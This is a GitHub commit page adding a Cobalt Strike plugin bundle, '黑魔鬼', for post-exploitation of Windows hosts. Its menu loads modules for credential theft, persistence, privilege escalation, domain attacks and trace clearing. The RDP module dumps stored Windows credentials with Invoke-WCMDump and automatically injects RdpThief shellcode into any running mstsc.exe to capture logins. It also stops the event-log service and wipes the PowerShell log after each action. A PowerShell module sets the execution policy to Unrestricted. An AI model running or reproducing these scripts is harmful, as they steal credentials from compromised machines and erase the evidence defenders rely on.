-
Notifications
You must be signed in to change notification settings - Fork 4
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing
63 changed files
with
18,076 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,2 +1,6 @@ | ||
| # CSplugins | ||
| 黑魔鬼插件 | ||
|
|
||
|
|
||
|
|
||
| 该插件是集成插件,有些来源于网络,有些是自己集成,没有后门,请放心使用。 |
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,19 @@ | ||
| popup beacon_bottom { | ||
| menu "黑魔鬼"{ | ||
| include(script_resource("modules/工作目录.cna")); | ||
| include(script_resource("modules/信息收集.cna")); | ||
| include(script_resource("modules/凭据获取.cna")); | ||
| include(script_resource("modules/权限维持.cna")); | ||
| include(script_resource("modules/权限提升.cna")); | ||
| include(script_resource("modules/用户相关.cna")); | ||
| include(script_resource("modules/RDP相关.cna")); | ||
| include(script_resource("modules/防火墙相关.cna")); | ||
| include(script_resource("modules/域渗透.cna")); | ||
| include(script_resource("modules/powershell相关.cna")); | ||
| include(script_resource("modules/内网穿透.cna")); | ||
| include(script_resource("modules/内网探测.cna")); | ||
| include(script_resource("modules/远程文件下载.cna")); | ||
| include(script_resource("modules/娱乐.cna")); | ||
| include(script_resource("modules/痕迹清除.cna")); | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,98 @@ | ||
| menu "RDP相关" { | ||
| item "查询RDP端口" { | ||
| blog($1, "-------------------------------------------------------------查询RDP端口-------------------------------------------------------------"); | ||
| bpowershell_import($1, script_resource("/powershell/RegRdpPort.ps1")); | ||
| bpowerpick($1,"RegRdpPort"); | ||
| bshell($1,"wevtutil cl \"Windows PowerShell\""); | ||
| } | ||
| item "查询RDP状态" { | ||
| blog($1, "-------------------------------------------------------------查询RDP状态-------------------------------------------------------------"); | ||
| bpowershell_import($1, script_resource("/powershell/CheckRdpStatus.ps1")); | ||
| bpowerpick($1,"CheckRdpStatus"); | ||
| bshell($1,"wevtutil cl \"Windows PowerShell\""); | ||
| } | ||
| item "开启RDP服务" { | ||
| blog($1, "-------------------------------------------------------------开启RDP服务-------------------------------------------------------------"); | ||
| bpowershell_import($1, script_resource("/powershell/RegfDenyTSConnections.ps1")); | ||
| bpowerpick($1,"RegfDenyTSConnections 0"); | ||
| bshell($1,"wevtutil cl \"Windows PowerShell\""); | ||
| } | ||
| item "关闭RDP服务" { | ||
| blog($1, "-------------------------------------------------------------关闭RDP服务-------------------------------------------------------------"); | ||
| bpowershell_import($1, script_resource("/powershell/RegfDenyTSConnections.ps1")); | ||
| bpowerpick($1,"RegfDenyTSConnections 1"); | ||
| bshell($1,"wevtutil cl \"Windows PowerShell\""); | ||
| } | ||
| item "查询RDP历史登录凭据" { | ||
| blog($1, "-------------------------------------------------------------查询RDP历史登录凭据-------------------------------------------------------------"); | ||
| bshell($bid,"cmdkey /list"); | ||
| } | ||
| item "获取RDP历史登录凭据" { | ||
| blog($1, "-------------------------------------------------------------获取RDP历史登录凭据-------------------------------------------------------------"); | ||
| bpowershell_import($1, script_resource("./powershell/Invoke-WCMDump.ps1")); | ||
| bpowerpick($1, "Invoke-WCMDump"); | ||
| bshell($1,"wevtutil cl \"Windows PowerShell\""); | ||
| } | ||
| item "获取RDP登录成功历史日志" { | ||
| blog($1, "-------------------------------------------------------------获取RDP登录成功历史日志-------------------------------------------------------------"); | ||
| bpowershell_import($1, script_resource("./powershell/EventLogSuccess.ps1")); | ||
| bpowerpick($1, "EventLogSuccess"); | ||
| bshell($1,"wevtutil cl \"Windows PowerShell\""); | ||
| } | ||
| item "获取RDP登录失败历史日志" { | ||
| blog($1, "-------------------------------------------------------------获取RDP登录失败历史日志-------------------------------------------------------------"); | ||
| bpowershell_import($1, script_resource("./powershell/EventLogFailed.ps1")); | ||
| bpowerpick($1, "EventLogFailed"); | ||
| bshell($1,"wevtutil cl \"Windows PowerShell\""); | ||
| } | ||
| item "查询RDP日志路径" { | ||
| blog($1, "-------------------------------------------------------------查询RDP日志路径-------------------------------------------------------------"); | ||
| bshell($1,"wmic nteventlog get path\,filename\,writeable"); | ||
| } | ||
| item "关闭EventlogService服务" { | ||
| blog($1, "-------------------------------------------------------------关闭EventlogService服务-------------------------------------------------------------"); | ||
| bpowershell_import($1, script_resource("./powershell/KillEvenlogService.ps1")); | ||
| bpowerpick($1,"KillEvenlogService"); | ||
| } | ||
| item "开启EventlogService服务" { | ||
| blog($1, "-------------------------------------------------------------开启EventlogService服务-------------------------------------------------------------"); | ||
| bshell($bid,"net start eventlog"); | ||
| } | ||
| @beacons = @(); | ||
| @pids = @(); | ||
| on heartbeat_5s{ | ||
| foreach $index => $beaconid (@beacons) | ||
| { | ||
|
|
||
| bps($beaconid,&handleProcess); | ||
| } | ||
| } | ||
| sub handleProcess{ | ||
| $processList = $2; | ||
| $index = indexOf($processList, "mstsc.exe", 0) + 9; | ||
| if($index > 9){ | ||
| $temp = substr($processList,$index,-1); | ||
| $pid = split("\t",$temp)[2]; | ||
|
|
||
| if ($pid !in @pids){ | ||
| add(@pids,$pid,0); | ||
| blog($1,"Injecting into mstsc.exe with PID: $pid"); | ||
| bshinject($1, $pid , "x64" ,script_resource("script/RdpThief_x64.tmp")); | ||
| } | ||
|
|
||
| } | ||
| } | ||
| menu "RdpThief"{ | ||
| item "开启Rdpthief"{ | ||
| blog($1, "RdpThief enabled \n"); | ||
| add(@beacons,$1,0); | ||
| } | ||
| item "关闭Rdpthief"{ | ||
| blog($1, "Disabling RdpThief"); | ||
| remove(@beacons,$1); | ||
| } | ||
| item "提取Rdpthief记录"{ | ||
| bshell($1,"type %temp%\\data.bin"); | ||
| } | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,20 @@ | ||
| menu "powershell相关" { | ||
| item "查看powershell相关信息"{ | ||
| blog($1, "-------------------------------------------------------------查看powershell相关信息--------------------------------------------------------"); | ||
| bexecute_assembly($1, script_resource('/exe/SharpCheckInfo.exe'), "-PowershellInfo"); | ||
| } | ||
| item "查看powershell执行策略" { | ||
| blog($1, "-------------------------------------------------------------查看powershell执行策略---------------------------------------------------------"); | ||
| bpowerpick($1,"get-Executionpolicy"); | ||
| } | ||
| item "允许加载powershell文件" { | ||
| blog($1, "-------------------------------------------------------------允许加载powershell文件---------------------------------------------------"); | ||
| bpowerpick($1,"Set-Itemproperty -path 'Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell' -Name 'ExecutionPolicy' -value 'Unrestricted'"); | ||
| bpowerpick($1,"get-Executionpolicy"); | ||
| } | ||
| item "禁止加载powershell文件" { | ||
| blog($1, "-------------------------------------------------------------禁止加载powershell文件-----------------------------------------------------"); | ||
| bpowerpick($1,"Set-Itemproperty -path 'Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell' -Name 'ExecutionPolicy' -value 'Restricted'"); | ||
| bpowerpick($1,"get-Executionpolicy"); | ||
| } | ||
| } |
Oops, something went wrong.